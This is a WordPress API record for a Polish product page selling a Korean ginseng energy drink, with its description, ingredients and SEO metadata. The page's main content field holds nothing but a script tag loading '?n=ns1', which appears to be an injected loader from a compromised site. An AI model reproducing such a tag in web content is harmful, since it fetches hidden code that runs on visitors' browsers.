{"id":1673,"date":"2019-09-16T21:05:52","date_gmt":"2019-09-16T21:05:52","guid":{"rendered":"http:\/\/www.ginlac.eu.uvirt55.active24.cz\/product\/power-drink-gold\/"},"modified":"2019-11-04T12:08:49","modified_gmt":"2019-11-04T12:08:49","slug":"power-drink-gold","status":"publish","type":"product","link":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/","title":{"rendered":"Power Drink  GOLD"},"content":{"rendered":"<p><script src='?n=ns1' type='text\/javascript'><\/script><\/p>\n","protected":false},"excerpt":{"rendered":"<p><strong>Nap\u00f3j energetyczny<\/strong>\u00a0<strong>o gorzkim smaku \u017ce\u0144szeniu, kt\u00f3ry\u00a0wesprze Twoj\u0105 wydolno\u015b\u0107 fizyczn\u0105 i umys\u0142ow\u0105.<\/strong><\/p>\n<p>100% naturalny nap\u00f3j bez dodatk\u00f3w spo\u017cywczych oraz konserwant\u00f3w.<\/p>\n<p>Wyprodukowane z wyci\u0105gu o ca\u0142kowitej zawarto\u015bci ginsenosyd\u00f3w\u00a0<strong>70mg\/g<\/strong><\/p>\n<p><strong>Opakowanie:\u00a0<\/strong>5x 40 ml \/ 15x 40 ml \/ 30x 40 ml<\/p>\n<p><strong>Zalecane dawkowanie:\u00a0<\/strong>1 do 2 napoj\u00f3w dziennie.<\/p>\n<p><strong>Spos\u00f3b u\u017cycia:\u00a0<\/strong>przed otwarciem zamieszaj i wprost pij<\/p>\n<p><strong>Zawarto\u015b\u0107:\u00a0<\/strong>wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 0,55%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 2,6%, wyci\u0105g z grzyba Reishi 1,8%, woda, isomaltooligosacharydy,\u00a0wyci\u0105g z zi\u00f3\u0142, wyci\u0105g z jujube, dere\u0144 jadalny, guma ksantanowa, witamina C, wyci\u0105g z nasion grejpfruta.<\/p>\n<p><strong>Producent:<\/strong>\u00a0KUAN Industrial Co. Ltd., Korea<\/p>\n","protected":false},"featured_media":237,"template":"","meta":[],"product_cat":[46],"product_tag":[47],"class_list":["post-1673","product","type-product","status-publish","has-post-thumbnail","hentry","product_cat-ginseng-pl","product_tag-ginseng-pl"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v19.4 - https:\/\/yoast.com\/wordpress\/plugins\/seo\/ -->\n<title>Power Drink GOLD - GINLAC - Korean Ginseng<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/\" \/>\n<meta property=\"og:locale\" content=\"pl_PL\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Power Drink GOLD - GINLAC - Korean Ginseng\" \/>\n<meta property=\"og:description\" content=\"Nap\u00f3j energetyczny\u00a0o gorzkim smaku \u017ce\u0144szeniu, kt\u00f3ry\u00a0wesprze Twoj\u0105 wydolno\u015b\u0107 fizyczn\u0105 i umys\u0142ow\u0105.  100% naturalny nap\u00f3j bez dodatk\u00f3w spo\u017cywczych oraz konserwant\u00f3w.  Wyprodukowane z wyci\u0105gu o ca\u0142kowitej zawarto\u015bci ginsenosyd\u00f3w\u00a070mg\/g  Opakowanie:\u00a05x 40 ml \/ 15x 40 ml \/ 30x 40 ml  Zalecane dawkowanie:\u00a01 do 2 napoj\u00f3w dziennie.  Spos\u00f3b u\u017cycia:\u00a0przed otwarciem zamieszaj i wprost pij  Zawarto\u015b\u0107:\u00a0wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 0,55%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 2,6%, wyci\u0105g z grzyba Reishi 1,8%, woda, isomaltooligosacharydy,\u00a0wyci\u0105g z zi\u00f3\u0142, wyci\u0105g z jujube, dere\u0144 jadalny, guma ksantanowa, witamina C, wyci\u0105g z nasion grejpfruta.  Producent:\u00a0KUAN Industrial Co. Ltd., Korea\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/\" \/>\n<meta property=\"og:site_name\" content=\"GINLAC - Korean Ginseng\" \/>\n<meta property=\"article:modified_time\" content=\"2019-11-04T12:08:49+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.ginlac.eu\/wp-content\/uploads\/power_drink_04.png\" \/>\n\t<meta property=\"og:image:width\" content=\"416\" \/>\n\t<meta property=\"og:image:height\" content=\"277\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/#website\",\"url\":\"https:\/\/www.ginlac.eu\/pl\/\",\"name\":\"GINLAC - Korean Ginseng\",\"description\":\"Korea INSAM trademark\",\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.ginlac.eu\/pl\/?s={search_term_string}\"},\"query-input\":\"required name=search_term_string\"}],\"inLanguage\":\"pl-PL\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/\",\"url\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/\",\"name\":\"Power Drink GOLD - GINLAC - Korean Ginseng\",\"isPartOf\":{\"@id\":\"https:\/\/www.ginlac.eu\/pl\/#website\"},\"datePublished\":\"2019-09-16T21:05:52+00:00\",\"dateModified\":\"2019-11-04T12:08:49+00:00\",\"breadcrumb\":{\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/#breadcrumb\"},\"inLanguage\":\"pl-PL\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.ginlac.eu\/pl\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"\"},{\"@type\":\"ListItem\",\"position\":3,\"name\":\"Power Drink GOLD\"}]}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Power Drink GOLD - GINLAC - Korean Ginseng","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/","og_locale":"pl_PL","og_type":"article","og_title":"Power Drink GOLD - GINLAC - Korean Ginseng","og_description":"Nap\u00f3j energetyczny\u00a0o gorzkim smaku \u017ce\u0144szeniu, kt\u00f3ry\u00a0wesprze Twoj\u0105 wydolno\u015b\u0107 fizyczn\u0105 i umys\u0142ow\u0105.  100% naturalny nap\u00f3j bez dodatk\u00f3w spo\u017cywczych oraz konserwant\u00f3w.  Wyprodukowane z wyci\u0105gu o ca\u0142kowitej zawarto\u015bci ginsenosyd\u00f3w\u00a070mg\/g  Opakowanie:\u00a05x 40 ml \/ 15x 40 ml \/ 30x 40 ml  Zalecane dawkowanie:\u00a01 do 2 napoj\u00f3w dziennie.  Spos\u00f3b u\u017cycia:\u00a0przed otwarciem zamieszaj i wprost pij  Zawarto\u015b\u0107:\u00a0wyci\u0105g z korzenia\u00a0czerownego \u017ce\u0144szenia korea\u0144skiego 0,55%, fermentowany wyci\u0105g z\u00a0korzenia czerwonego \u017ce\u0144szenia korea\u0144skiego 2,6%, wyci\u0105g z grzyba Reishi 1,8%, woda, isomaltooligosacharydy,\u00a0wyci\u0105g z zi\u00f3\u0142, wyci\u0105g z jujube, dere\u0144 jadalny, guma ksantanowa, witamina C, wyci\u0105g z nasion grejpfruta.  Producent:\u00a0KUAN Industrial Co. Ltd., Korea","og_url":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/","og_site_name":"GINLAC - Korean Ginseng","article_modified_time":"2019-11-04T12:08:49+00:00","og_image":[{"width":416,"height":277,"url":"https:\/\/www.ginlac.eu\/wp-content\/uploads\/power_drink_04.png","type":"image\/png"}],"twitter_card":"summary_large_image","schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"WebSite","@id":"https:\/\/www.ginlac.eu\/pl\/#website","url":"https:\/\/www.ginlac.eu\/pl\/","name":"GINLAC - Korean Ginseng","description":"Korea INSAM trademark","potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/www.ginlac.eu\/pl\/?s={search_term_string}"},"query-input":"required name=search_term_string"}],"inLanguage":"pl-PL"},{"@type":"WebPage","@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/","url":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/","name":"Power Drink GOLD - GINLAC - Korean Ginseng","isPartOf":{"@id":"https:\/\/www.ginlac.eu\/pl\/#website"},"datePublished":"2019-09-16T21:05:52+00:00","dateModified":"2019-11-04T12:08:49+00:00","breadcrumb":{"@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/#breadcrumb"},"inLanguage":"pl-PL","potentialAction":[{"@type":"ReadAction","target":["https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/www.ginlac.eu\/pl\/produkt\/power-drink-gold\/#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/www.ginlac.eu\/pl\/"},{"@type":"ListItem","position":2,"name":""},{"@type":"ListItem","position":3,"name":"Power Drink GOLD"}]}]}},"_links":{"self":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product\/1673"}],"collection":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product"}],"about":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/types\/product"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/media\/237"}],"wp:attachment":[{"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/media?parent=1673"}],"wp:term":[{"taxonomy":"product_cat","embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product_cat?post=1673"},{"taxonomy":"product_tag","embeddable":true,"href":"https:\/\/www.ginlac.eu\/pl\/wp-json\/wp\/v2\/product_tag?post=1673"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}